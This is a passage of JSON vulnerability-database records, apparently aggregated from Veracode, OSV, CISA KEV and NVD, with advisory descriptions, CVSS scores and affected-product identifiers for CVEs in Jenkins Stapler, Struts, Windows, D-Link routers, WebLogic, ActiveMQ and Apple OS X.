"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T20:21:27", "id": "VERACODE:19781", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19781/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:12:30", "description": "struts2-struts1-plugin is vulnerable to remote code execution (RCE) attacks. These attacks are possible because the user input are not sanitized and are directly passed through `messages.add()` to be used as a part of an error message in the `ActionMessage` class. 
This doesn't affect users of the Struts 2.5.x series or applications that do not use the Struts 1 plugin.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-07T21:38:00", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2020-05-28T21:01:34", "id": "VERACODE:4553", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-4553/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-11T01:45:22", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2020-07-30T00:00:00", "id": "AKB:2667139A-86E4-412A-BB06-C85E8DDEF95F", "href": "https://attackerkb.com/topics/DiGQgeYWcy/cve-2015-1130", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Jenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": 
"2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2018-1000861", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:17:33", "description": "If a Volume Shadow Copy (VSS) shadow copy of the system drive is available, users can read the SAM file which would allow any user to escalate privileges to SYSTEM level.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows SAM Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2021-36934", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T11:17:53", "description": "Heap-based buffer overflow in IOHIDFamily in Apple OS X, which affects, iOS before 8 and Apple TV before 7, allows attackers to execute arbitrary code in a privileged context.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apple OS X Heap-Based Buffer Overflow Vulnerability", "bulletinFamily": "info", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2014-4404", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T03:17:55", "description": "D-Link DIR-645 Wired/Wireless Router allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "D-Link DIR-645 Router Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2051"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-2051", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Windows Shell in multiple versions of Microsoft Windows allows local users or remote attackers to execute arbitrary code via a crafted .LNK file", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-8464", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-26T15:21:56", "description": "The Fileserver web application in Apache ActiveMQ allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apache ActiveMQ Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2016-3088", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-05-28T03:17:55", "description": "Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft HTTP.sys Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-1635", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "A remote code execution vulnerability exists in Microsoft Office.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0262"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-0262", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Win32k contains a privilege escalation vulnerability due to the Windows kernel-mode driver failing to properly handle objects in memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-0263", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T03:17:55", "description": "The XPC implementation in Admin Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges.", "cvss3": {}, "published": 
"2022-02-10T00:00:00", "type": "cisa_kev", "title": "Apple OS X Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2015-1130", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:22:25", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-10T14:29:00", "type": "cve", "title": "CVE-2018-1000861", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2022-06-13T19:00:00", "cpe": ["cpe:/a:redhat:openshift_container_platform:3.11", "cpe:/a:jenkins:jenkins:2.153", "cpe:/a:jenkins:jenkins:2.138.3"], "id": "CVE-2018-1000861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.153:*:*:*:-:*:*:*", "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.138.3:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-05-23T15:35:37", "description": "Windows Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:15:00", "type": "cve", "title": "CVE-2021-36934", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-12T17:42:00", "cpe": 
["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-36934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36934", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T10:14:33", "description": "Heap-based buffer overflow in IOHIDFamily in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted key-mapping properties.", "cvss3": {}, "published": "2014-09-18T10:55:00", "type": "cve", "title": "CVE-2014-4404", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.0.2", "cpe:/o:apple:tvos:6.0", "cpe:/o:apple:tvos:6.2", "cpe:/o:apple:iphone_os:7.0.4", "cpe:/o:apple:tvos:6.0.2", "cpe:/o:apple:iphone_os:7.1.1", "cpe:/o:apple:tvos:6.0.1", "cpe:/o:apple:iphone_os:7.1", "cpe:/o:apple:iphone_os:7.0.3", "cpe:/o:apple:iphone_os:7.0.2", "cpe:/o:apple:iphone_os:7.0", "cpe:/o:apple:tvos:6.1", "cpe:/o:apple:tvos:6.1.1", "cpe:/o:apple:iphone_os:7.0.6", 
"cpe:/o:apple:iphone_os:7.1.2", "cpe:/o:apple:iphone_os:7.0.1", "cpe:/o:apple:iphone_os:7.0.5", "cpe:/o:apple:tvos:6.1.2"], "id": "CVE-2014-4404", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:tvos:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:09:11", "description": "The D-Link DIR-645 Wired/Wireless Router Rev. 
Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.", "cvss3": {}, "published": "2015-02-23T17:59:00", "type": "cve", "title": "CVE-2015-2051", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2051"], "modified": "2023-04-26T19:27:00", "cpe": ["cpe:/o:dlink:dir-645_firmware:1.04b12"], "id": "CVE-2015-2051", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2051", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:dlink:dir-645_firmware:1.04b12:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T15:07:24", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. 
aka \"LNK Remote Code Execution Vulnerability.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8464", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2017-8464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", 